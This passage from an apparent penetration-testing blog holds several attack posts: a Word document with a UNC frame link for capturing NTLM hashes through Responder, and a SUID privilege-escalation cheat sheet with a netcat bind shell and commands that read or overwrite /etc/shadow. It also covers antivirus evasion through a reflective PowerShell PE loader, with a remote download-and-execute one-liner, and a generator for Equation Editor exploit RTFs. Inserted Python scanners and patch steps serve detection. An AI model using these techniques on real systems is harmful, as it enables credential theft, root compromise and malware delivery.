    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\172.16.103.130\Updates.docx" TargetMode="External"/>
    </Relationships>
    

    This contains the UNC path, pointing at our Responder.

    Then rename the document back to .docx and start Responder:

    python Responder.py -I eth0 -wrf
    

    Opening the Word document yields the hash:


    Of course, other methods such as DDE and CVE-2017-0199 also work.
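    The two files the post modifies are both plain XML inside the zip container, so the technique is easy to check for on the receiving side: a <w:frame> in word/webSettings.xml whose <w:sourceFileName r:id="..."/> resolves, through word/_rels/webSettings.xml.rels, to an external Relationship with a UNC Target. The following scanner is an added example written for this page (it is not part of the post or of Responder); it builds a benign and a frame-linked sample document in memory, so the constructed target address is a placeholder and nothing is fetched.

```python
"""Added detection example for this page (not from the original post): flag a
.docx whose word/webSettings.xml declares a frameset and whose
word/_rels/webSettings.xml.rels resolves that frame to an external UNC target."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by the two files shown in the post.
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def is_unc(target):
    """A UNC (\\\\host\\share) or file: target is what makes Word open an SMB session."""
    t = target.strip().lower()
    return t.startswith("\\\\") or t.startswith("//") or t.startswith("file:")


def scan_docx(docx_bytes):
    """Return a report; 'unc_frames' is non-empty when a frame points at a UNC path."""
    report = {"frames": {}, "external_rels": {}, "unc_frames": []}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        if "word/webSettings.xml" in names:
            root = ET.fromstring(zf.read("word/webSettings.xml"))
            for frame in root.iter("{%s}frame" % W_NS):
                name_el = frame.find("{%s}name" % W_NS)
                src_el = frame.find("{%s}sourceFileName" % W_NS)
                rid = src_el.get("{%s}id" % R_NS) if src_el is not None else None
                report["frames"][rid] = name_el.get("{%s}val" % W_NS) if name_el is not None else None
        rels_name = "word/_rels/webSettings.xml.rels"
        if rels_name in names:
            root = ET.fromstring(zf.read(rels_name))
            for rel in root.iter("{%s}Relationship" % PKG_NS):
                if rel.get("TargetMode") == "External":
                    report["external_rels"][rel.get("Id")] = rel.get("Target", "")
    # Join the two files: a frame is only dangerous if its rId resolves to a UNC target.
    for rid in report["frames"]:
        target = report["external_rels"].get(rid)
        if target is not None and is_unc(target):
            report["unc_frames"].append((rid, target))
    return report


# --- constructed sample documents (minimal zips, not real Word output) ---------
WEBSETTINGS_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:webSettings xmlns:w="%s" xmlns:r="%s">%s'
    '<w:optimizeForBrowser/><w:allowPNG/></w:webSettings>'
)
FRAMESET = (
    '<w:frameset><w:framesetSplitbar><w:w w:val="60"/><w:color w:val="auto"/>'
    '<w:noBorder/></w:framesetSplitbar><w:frameset><w:frame><w:name w:val="3"/>'
    '<w:sourceFileName r:id="rId1"/><w:linkedToFile/></w:frame></w:frameset></w:frameset>'
)
RELS_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s/frame" '
    'Target="%s" TargetMode="External"/></Relationships>'
)


def build_sample_docx(frame_target=None):
    """Build an in-memory docx; with frame_target set it carries the frameset and rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        body = FRAMESET if frame_target else ""
        zf.writestr("word/webSettings.xml", WEBSETTINGS_TEMPLATE % (W_NS, R_NS, body))
        if frame_target:
            zf.writestr("word/_rels/webSettings.xml.rels",
                        RELS_TEMPLATE % (PKG_NS, R_NS, frame_target))
    return buf.getvalue()


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address used here as a placeholder.
    print(scan_docx(build_sample_docx("\\\\192.0.2.10\\Updates.docx")))
```

    On a real mail gateway the same two lookups extend naturally to the other relationship files under word/_rels, since any External relationship with a UNC Target triggers the same SMB connection.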


  • 12/19/17--19:49: SUID Privilege Escalation (chan 69772723)
  • In Linux privilege escalation, SUID files can be used to escalate. The purpose of SUID is that when a user who lacks the corresponding permissions runs the program, it can access resources the user otherwise could not. The following commands are commonly used to find files with the SUID bit set:

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    

    For example, nmap:

    ls -l /usr/bin/nmap
    -rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
    

    An s in the permission bits indicates the SUID bit is set and the file executes with root's privileges. Below is a summary of several kinds of files that can be used for privilege escalation:

    1.Nmap

    Older versions of nmap (2.02-5.21) have an interactive mode that allows the user to execute system commands. Escalation method:

    nmap --interactive
    

    Then run the command:

    nmap> !sh
    sh-3.2# whoami
    root
    

    The corresponding msf module is:

    exploit/unix/local/setuid_nmap
    

    2.Find

    touch test
    find test -exec whoami \;
    

    If nc is installed on the server, the following command can be used directly to listen:

    find test -exec netcat -lvp 5555 -e /bin/sh \;
    

    Then connect:

    netcat 192.168.1.100 5555
    

    This yields a root shell.

    3.vim/vi

    Open vim, press ESC, then:

    :set shell=/bin/sh
    :shell
    

    Commands can then be executed.

    4.bash

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
    

    5.less

    less /etc/passwd
    !/bin/sh
    

    6.more

    more /home/pelle/myfile
    !/bin/bash
    

    7.cp

    Use cp to overwrite /etc/shadow.

    8.mv

    Use mv to overwrite /etc/shadow or /etc/sudoers.

    9.awk

    awk 'BEGIN {system("/bin/bash")}'
    

    10.man

    man passwd
    !/bin/bash
    

    11.python/perl/ruby/lua/etc

    perl:

    exec "/bin/bash";
    

    python:

    import os
    os.system("/bin/bash")
    

    12.tcpdump

    echo $'id\ncat /etc/shadow' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    

    Additions welcome.
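    The three find commands at the top of the post are the audit side of this list: a root-owned SUID copy of any of the binaries above is a misconfiguration worth catching before someone else does. The script below is an added example written for this page, not part of the post; it applies the same three conditions as `find / -user root -perm -4000 -type f` to stat results, renders the permission string so the `s` the post points at is visible, and flags the basenames the post lists. The baseline set in `unexpected_suid` is an assumption the operator fills from a known-good host.

```python
"""Added auditing example for this page (not from the original post): find
root-owned SUID regular files the way `find / -user root -perm -4000 -type f`
does and flag the ones the post lists as able to spawn a shell or overwrite files."""
import os
import stat

# Basenames from the post's list; any of these with a root SUID bit is a finding.
SHELL_ESCAPE_BASENAMES = {
    "nmap", "find", "vim", "vi", "bash", "less", "more", "cp", "mv",
    "awk", "man", "python", "perl", "ruby", "lua", "tcpdump",
}


def classify_entry(path, st_mode, st_uid):
    """Classify one directory entry from its stat fields.

    Returns None unless it is a regular file, owned by uid 0, with S_ISUID set
    (the same three conditions as `-type f -user root -perm -4000`).
    """
    if not stat.S_ISREG(st_mode) or st_uid != 0 or not (st_mode & stat.S_ISUID):
        return None
    base = os.path.basename(path)
    # python3.6 / perl5 / vim.basic -> python / perl / vim
    stem = base.split(".")[0].rstrip("0123456789")
    return {
        "path": path,
        "perm": stat.filemode(st_mode),  # e.g. -rwsr-xr-x, the 's' the post points at
        "known_shell_escape": base in SHELL_ESCAPE_BASENAMES or stem in SHELL_ESCAPE_BASENAMES,
    }


def scan_suid(root="/"):
    """Walk root and return findings; unreadable entries are skipped, symlinks not followed."""
    findings = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            hit = classify_entry(path, st.st_mode, st.st_uid)
            if hit:
                findings.append(hit)
    return findings


def unexpected_suid(findings, baseline):
    """Return findings whose path is not in the operator's baseline of expected SUID files."""
    return [f for f in findings if f["path"] not in baseline]


if __name__ == "__main__":
    # Assumed baseline: fill this from a freshly installed host of the same distribution.
    BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}
    for f in sorted(unexpected_suid(scan_suid("/usr"), BASELINE), key=lambda f: f["path"]):
        print(f["perm"], f["path"], "SHELL-ESCAPE" if f["known_shell_escape"] else "")
```

    The two outputs are meant to be read together: anything flagged SHELL-ESCAPE needs its SUID bit removed (or the binary replaced), and anything outside the baseline needs an owner who can explain why it is there.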



    Sometimes, when using an exploit to escalate privileges, the exploit may be detected and removed. Of course, if we have the source we can modify it to evade detection, but today I'll introduce another method: using a PE loader to load the exploit.
    The PowerShell PE loader is here; looking at the code we can see that the script is very simple to use. The usage is as follows:

    $PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
    

    It takes the exploit's bytes and then loads the exploit in memory, so the idea is simple: we only need to convert the desired exploit into a string and write it into the script to build a PowerShell script.

    Here is a script I put together to make the conversion convenient:

    function Convert-BinaryToString {
       [CmdletBinding()] param (
          [string] $FilePath
       )
       try {
          $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
       }
       catch {
          throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
       }
       if ($ByteArray) {
          $Base64String = [System.Convert]::ToBase64String($ByteArray);
       }
       else {
          throw '$ByteArray is $null.';
       }
       $Base64String | set-content ("b64.txt")
    }
    

    zcgonvh's MS16-032 build is used for the demonstration. Convert it with the script:

    PS C:\Users\evi1cg\Desktop\16_032> . .\Convert-BinaryToString.ps1
    PS C:\Users\evi1cg\Desktop\16_032> Convert-BinaryToString -FilePath .\ms16-032_x64.exe
    

    This produces the base64 string and stores it in b64.txt.

    Convert it back with:

    $InputString = "base64string"
    $PEBytes = [System.Convert]::FromBase64String($InputString)
    

    Then it can be loaded with

    Invoke-ReflectivePEInjection -PEBytes $PEBytes
    

    Finally, here is the finished script:

    E2P_MS16-032.ps1

    Usage:

    E2P_MS16-032 -Command '"net user"'
    


    Script on GitHub:

    Remote load command:

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/E2P_MS16-032.ps1');E2P_MS16-032 -Command '\"whoami\"'"
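    The same conversion works in reverse for a defender looking at a suspicious script: a very long base64 literal that decodes to bytes starting with MZ is an embedded executable, whatever the surrounding code calls it. The following triage helper is an added example, not part of the original post or the loader project. It finds long base64 runs in script text, decodes them and checks for a PE header; the fake_pe_image() helper and SAMPLE_SCRIPT are constructed stand-ins (a header-only image, not a real executable), and the 200-character minimum run length is an assumption.

```python
"""Find base64 literals in a PowerShell script that decode to a PE image."""
import base64
import binascii
import re
import struct

# A base64 run long enough to be a file rather than a short string.  Real
# embedded executables are hundreds of kilobytes; 200 chars is a deliberately
# low bar (assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def pe_machine(blob):
    """Return the Machine field of a PE image, or None if blob is not a PE."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]   # offset of "PE\0\0"
    if e_lfanew + 6 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", blob, e_lfanew + 4)[0]


def find_embedded_pe(script_text):
    """Return [{'offset', 'size', 'machine'}] for every base64 run in the
    script that decodes to a PE image."""
    findings = []
    for m in B64_RUN.finditer(script_text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue                         # not valid base64 after all
        machine = pe_machine(blob)
        if machine is not None:
            findings.append({"offset": m.start(), "size": len(blob),
                             "machine": machine})
    return findings


def fake_pe_image(machine=0x8664, size=300):
    """Constructed stand-in for a PE file: DOS header, e_lfanew, PE signature
    and Machine field, zero-padded.  Not a runnable executable."""
    e_lfanew = 0x80
    img = bytearray(size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", img, e_lfanew + 4, machine)
    return bytes(img)


# Constructed sample in the shape the conversion above produces.
SAMPLE_SCRIPT = (
    '$InputString = "%s"\n'
    '$PEBytes = [System.Convert]::FromBase64String($InputString)\n'
    'Invoke-ReflectivePEInjection -PEBytes $PEBytes\n'
) % base64.b64encode(fake_pe_image()).decode()

if __name__ == "__main__":
    for f in find_embedded_pe(SAMPLE_SCRIPT):
        print("embedded PE at char %d: %d bytes, Machine=0x%04x"
              % (f["offset"], f["size"], f["machine"]))
```

    The Machine value (0x8664 for x64, 0x14c for x86) tells you which architecture the embedded binary targets before you hand it to a sandbox or hash it against threat intelligence.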
    



  • 01/12/18--03:41: Exploiting CVE-2018-0802 (chan 69772723)
  • After CVE-2017-11882, January 2018 brought a new "Equation nightmare, second generation". The in-the-wild sample embedded two Equation objects, exploiting an N-day and a 0-day at the same time: the N-day attacks unpatched systems, while the 0-day attacks fully patched systems, bypassing the ASLR (address space layout randomization) protection introduced by the CVE-2017-11882 patch; the attack ultimately plants a malicious remote-control program on the user's computer. For an analysis of the vulnerability, see here. Today I saw a CVE-2018-0802 exploit script published on GitHub, at this address, and to make the exploit as complete as possible I wrote RTF_11882_0802.

    GITHUB:
    This script combines the two Equation Editor exploits.

    Usage is the same as before:

    python RTF_11882_0802.py -c "cmd.exe /c calc.exe"  -i test.rtf -o test.doc
    

    It simply inserts two Equation Editor objects into the document, one for 11882 and one for 0802.

    The 0-day used by "Equation nightmare II" (CVE-2018-0802) is practically a twin of CVE-2017-11882. One vulnerability in the attack sample targets systems before the patch, the other targets patched systems, and the two OLE objects attack together, so the carefully built sample works regardless of patch state. Both the exploitation trick and the ASLR bypass rest on a degree of coincidence: if the EQNEDT32.EXE module had contained no ret instruction meeting the conditions needed to bypass ASLR, if lpLogFont were not the first argument of sub_21774, or if the CVE-2017-11882 patch had forced DEP on, "Equation nightmare II" would have had no opening.
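    For detection, the useful fact above is that both exploits ride on the same object type: a document that embeds Equation Editor (Equation.3) OLE objects, and especially one that embeds two of them, deserves a closer look. The following triage helper is an added example, not part of the original post or the RTF_11882_0802 script. It enumerates the \objclass / \objdata pairs in RTF text, reads the class name from the OLE 1.0 object header inside each payload and counts the Equation.3 objects; SAMPLE_RTF and the _ole1_hex() payload builder are constructed (filler bytes, no exploit data).

```python
"""Count Equation Editor OLE objects embedded in an RTF document."""
import re
import struct

OBJCLASS = re.compile(r"\\objclass\s+([A-Za-z0-9_.]+)")
OBJDATA = re.compile(r"\\objdata\s+([0-9A-Fa-f\s]+)")


def ole1_class_name(blob):
    """Read the class name from an OLE 1.0 object header: OLEVersion (4 bytes),
    FormatID (4 bytes, 2 = embedded), then a length-prefixed ANSI class name."""
    if len(blob) < 12:
        return None
    _version, format_id, name_len = struct.unpack_from("<III", blob, 0)
    if format_id != 2:
        return None
    return blob[12:12 + name_len].rstrip(b"\0").decode("latin-1")


def scan_rtf(text):
    """Return one dict per \\objclass: the declared class, the class found in
    the OLE 1.0 payload that follows it (if any) and the payload size."""
    objects = []
    for m in OBJCLASS.finditer(text):
        entry = {"declared": m.group(1), "payload_class": None, "payload_size": 0}
        d = OBJDATA.search(text, m.end())
        if d:
            try:
                blob = bytes.fromhex("".join(d.group(1).split()))
            except ValueError:
                blob = b""                   # malformed hex: keep declared class only
            entry["payload_class"] = ole1_class_name(blob)
            entry["payload_size"] = len(blob)
        objects.append(entry)
    return objects


def equation_object_count(text):
    """Number of objects whose declared or embedded class is Equation.3."""
    return sum(1 for o in scan_rtf(text)
               if "Equation.3" in (o["declared"], o["payload_class"]))


def _ole1_hex(class_name, payload):
    """Build constructed OLE 1.0 objdata hex for the sample (filler payload)."""
    name = class_name.encode() + b"\0"
    hdr = struct.pack("<III", 0x501, 2, len(name)) + name
    return (hdr + payload).hex()


# Constructed sample: two Equation.3 objects plus one Package object, the
# layout the post describes (one Equation object per CVE).
SAMPLE_RTF = (
    r"{\rtf1\ansi"
    r"{\object\objemb{\*\objclass Equation.3}{\*\objdata " + _ole1_hex("Equation.3", b"A" * 64) + "}}"
    r"{\object\objemb{\*\objclass Package}{\*\objdata " + _ole1_hex("Package", b"B" * 32) + "}}"
    r"{\object\objemb{\*\objclass Equation.3}{\*\objdata " + _ole1_hex("Equation.3", b"C" * 64) + "}}"
    "}"
)

if __name__ == "__main__":
    for o in scan_rtf(SAMPLE_RTF):
        print(o)
    n = equation_object_count(SAMPLE_RTF)
    print("Equation.3 objects:", n,
          "(two objects matches the dual 11882/0802 pattern)" if n == 2 else "")
```

    Checking the class name inside the payload as well as the declared \objclass matters because the two need not agree; a mismatch is itself a signal worth flagging.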

    Mitigation

    1. Install the patch promptly

    Patch download:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802

    2. Disable the module through the registry. As a workaround, the following COM control can be disabled via the registry, where XX.X is the Office version number.

    Enter in the Run dialog:

    reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
    
    reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
    

    Note: this script is for security research only; do not use it illegally. This site accepts no responsibility for any legal issues or consequences arising from its use.